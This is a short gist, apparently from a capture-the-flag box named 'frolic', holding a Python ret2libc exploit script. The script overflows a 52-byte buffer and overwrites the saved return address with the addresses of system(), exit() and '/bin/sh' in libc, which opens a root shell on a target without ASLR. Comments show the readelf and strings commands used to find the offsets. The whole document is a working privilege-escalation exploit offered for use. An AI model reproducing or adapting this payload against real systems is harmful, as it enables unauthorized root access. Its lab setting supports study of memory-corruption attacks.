@ibLeDy
Last active December 9, 2023 19:19
Privilege escalation via EIP buffer overflow
#!/usr/bin/python
# ret2libc payload: the overflow overwrites the saved return address (EIP) with
# the address of system(), followed by exit() as system()'s return address and
# a pointer to the "/bin/sh" string inside libc as system()'s argument.
import sys
from struct import pack

offset = 52                 # bytes from the start of the buffer to the saved EIP
junk = "A" * offset         # filler up to the saved return address
base_libc = 0xb7e19000      # libc base on the target; only valid while the mapping does not move (no ASLR)

# Symbol offsets inside libc, taken from readelf on the target:
# www-data@frolic:/tmp$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -E "\ssystem|\sexit"
#   141: 0002e9d0    31 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
#  1457: 0003ada0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0
system_addr_offset = 0x0003ada0
exit_addr_offset = 0x0002e9d0

# Offset of the "/bin/sh" string inside libc:
# www-data@frolic:/tmp$ strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
#  15ba0b /bin/sh
bin_sh_addr_offset = 0x0015ba0b

# Absolute addresses, packed as 32-bit little-endian values.
system_addr = pack("<I", base_libc + system_addr_offset)
exit_addr = pack("<I", base_libc + exit_addr_offset)
bin_sh_addr = pack("<I", base_libc + bin_sh_addr_offset)

# Stack layout after the overflow: [junk][&system][&exit][&"/bin/sh"]
payload = junk.encode() + system_addr + exit_addr + bin_sh_addr

# Write the raw bytes instead of print(): on Python 3, print() would emit the
# repr (b'...') rather than the payload itself. Works on Python 2 as well.
out = getattr(sys.stdout, "buffer", sys.stdout)
out.write(payload)